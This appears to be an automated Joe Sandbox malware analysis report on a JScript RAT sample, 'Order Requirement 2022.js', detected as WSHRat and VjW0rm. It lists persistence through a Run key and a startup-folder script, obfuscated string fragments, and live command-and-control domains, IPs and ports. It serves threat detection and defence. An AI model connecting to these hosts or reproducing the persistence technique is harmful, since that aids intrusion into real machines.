Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order Requirement 2022.js

Overview

General Information

Sample Name:Order Requirement 2022.js
Analysis ID:715072
MD5:e873a424159d2557551d0f4684af7a5f
SHA1:7dfcc66a95100143fae12531151355d2016718f0
SHA256:0d5a587f0c1dcff512f6112ee48859608db08307aa39887cc71480998d7070d4
Tags:jsVjw0rm
Infos:

Detection

WSHRat, VjW0rm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected WSHRAT
Detected WSHRat
System process connects to network (likely due to code injection or exploit)
Sigma detected: Register Wscript In Run Key
JScript performs obfuscated calls to suspicious functions
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Drops script at startup location
Sigma detected: VjW0rm
Snort IDS alert for network traffic
Wscript called in batch mode (surpress errors)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Potential malicious VBS/JS script found (suspicious encoded strings)
Drops script or batch files to the startup folder
Uses known network protocols on non-standard ports
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to query the security center for anti-virus and firewall products
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Creates a start menu entry (Start Menu\Programs\Startup)
Stores files to the Windows start menu directory
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 672 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Requirement 2022.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 748 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 2332 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • wscript.exe (PID: 6100 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 1248 cmdline: C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 2804 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 5412 cmdline: C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 1876 cmdline: C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 3232 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 5292 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 2772 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 1956 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • wscript.exe (PID: 5776 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_WSHRATYara detected WSHRATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.845740262.000001E45640E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VjW0rmYara detected VjW0rmJoe Security
      0000000E.00000003.546167949.000001E45640E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VjW0rmYara detected VjW0rmJoe Security
        00000002.00000003.346293587.0000025291B28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
          00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VjW0rmYara detected VjW0rmJoe Security
            0000000D.00000002.894056339.000001B9F4488000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
              Click to see the 93 entries

              Sigma Signatures

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 672, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js

              Persistence and Installation Behavior

              barindex
              Sigma detected: Register Wscript In Run Key
              Source: Registry Key setAuthor: Joe Security: Data: Details: wscript.exe //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 672, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Order Requirement 2022
              Sigma detected: VjW0rm
              Source: Registry Key setAuthor: Joe Security: Data: Details: FALSE, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 748, TargetObject: HKEY_CURRENT_USER\vjw0rm

              Snort Signatures

              Timestamp:192.168.2.5109.248.150.1384973320222017516 10/03/22-15:58:08.503396
              SID:2017516
              Source Port:49733
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384980020222017516 10/03/22-16:00:06.684129
              SID:2017516
              Source Port:49800
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384978220222017516 10/03/22-15:59:34.417510
              SID:2017516
              Source Port:49782
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384979620222017516 10/03/22-16:00:01.475367
              SID:2017516
              Source Port:49796
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384974320222017516 10/03/22-15:58:25.510035
              SID:2017516
              Source Port:49743
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384974920222017516 10/03/22-15:58:35.892450
              SID:2017516
              Source Port:49749
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384973720222017516 10/03/22-15:58:13.983128
              SID:2017516
              Source Port:49737
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384979220222017516 10/03/22-15:59:50.918382
              SID:2017516
              Source Port:49792
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384980620222017516 10/03/22-16:00:17.051647
              SID:2017516
              Source Port:49806
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384973220222017516 10/03/22-15:58:03.289656
              SID:2017516
              Source Port:49732
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384979520222017516 10/03/22-15:59:56.411392
              SID:2017516
              Source Port:49795
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384976220222017516 10/03/22-15:58:56.662534
              SID:2017516
              Source Port:49762
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384972620222017516 10/03/22-15:57:51.886582
              SID:2017516
              Source Port:49726
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384980320222017516 10/03/22-16:00:11.895919
              SID:2017516
              Source Port:49803
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384978920222017516 10/03/22-15:59:45.746117
              SID:2017516
              Source Port:49789
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384975220222017516 10/03/22-15:58:41.269693
              SID:2017516
              Source Port:49752
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384977920222017516 10/03/22-15:59:29.278633
              SID:2017516
              Source Port:49779
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384978520222017516 10/03/22-15:59:40.597927
              SID:2017516
              Source Port:49785
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384977420222017516 10/03/22-15:59:18.917860
              SID:2017516
              Source Port:49774
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384972820222017516 10/03/22-15:57:57.222154
              SID:2017516
              Source Port:49728
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384975820222017516 10/03/22-15:58:51.515086
              SID:2017516
              Source Port:49758
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384976420222017516 10/03/22-15:59:03.007718
              SID:2017516
              Source Port:49764
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384974720222017516 10/03/22-15:58:30.696047
              SID:2017516
              Source Port:49747
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384976720222017516 10/03/22-15:59:08.214794
              SID:2017516
              Source Port:49767
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384977020222017516 10/03/22-15:59:13.447659
              SID:2017516
              Source Port:49770
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384975420222017516 10/03/22-15:58:46.360659
              SID:2017516
              Source Port:49754
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384974020222017516 10/03/22-15:58:19.149330
              SID:2017516
              Source Port:49740
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5109.248.150.1384977720222017516 10/03/22-15:59:24.067780
              SID:2017516
              Source Port:49777
              Destination Port:2022
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://javaautorun.duia.ro:5465/VreM3:.0Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VrewAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vrecnkgew0KhNAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vre63209-4053062332-100Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vre.duia.ro:5465/VreAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreYWNlKCIlAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VredAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vrecnkgew0KAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vrero6Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreMCAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vreoh_AEAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreYAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VresofdowchesAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VrerAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreoAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreConnectionKeep-AliveAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VredmFyIGZyhNAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VrejAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/ZpbGUAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VrelAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vre$KAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VrefAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VrehAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vre:Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreMeAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreZXNwb25zAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreZXNwb25zf/Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreSAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreNAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreMAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VredmFyIGZyAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vre#Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vre1_Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vres);Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vre.Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreoiAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/Vre0Avira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VrehNAvira URL Cloud: Label: malware
              Source: http://javaautorun.duia.ro:5465/VreorAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: jbd231.duckdns.orgVirustotal: Detection: 13%Perma Link
              Source: javaautorun.duia.roVirustotal: Detection: 12%Perma Link
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

              Software Vulnerabilities

              barindex
              JavaScript source code contains functionality to generate code involving a shell, file or stream
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition
              Source: Order Requirement 2022.jsReturn value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']Go to definition

              Networking

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\wscript.exeDomain query: jbd231.duckdns.org
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 109.248.150.138 2022
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 154.120.126.87 5465
              Source: C:\Windows\System32\wscript.exeDomain query: javaautorun.duia.ro
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 109.248.144.237 2022Jump to behavior
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49726 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49728 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49732 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49733 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49737 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49740 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49743 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49747 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49749 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49752 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49754 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49758 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49762 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49764 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49767 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49770 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49774 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49777 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49779 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49782 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49785 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49789 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49792 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49795 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49796 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49800 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49803 -> 109.248.150.138:2022
              Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49806 -> 109.248.150.138:2022
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 2022
              Uses dynamic DNS services
              Source: unknownDNS query: name: jbd231.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.5:49700 -> 154.120.126.87:5465
              Source: global trafficTCP traffic: 192.168.2.5:49701 -> 109.248.144.237:2022
              Source: global trafficTCP traffic: 192.168.2.5:49726 -> 109.248.150.138:2022
              Source: Joe Sandbox ViewASN Name: DATACLUBLV DATACLUBLV
              Source: Joe Sandbox ViewASN Name: SpectranetNG SpectranetNG
              Source: Joe Sandbox ViewIP Address: 109.248.150.138 109.248.150.138
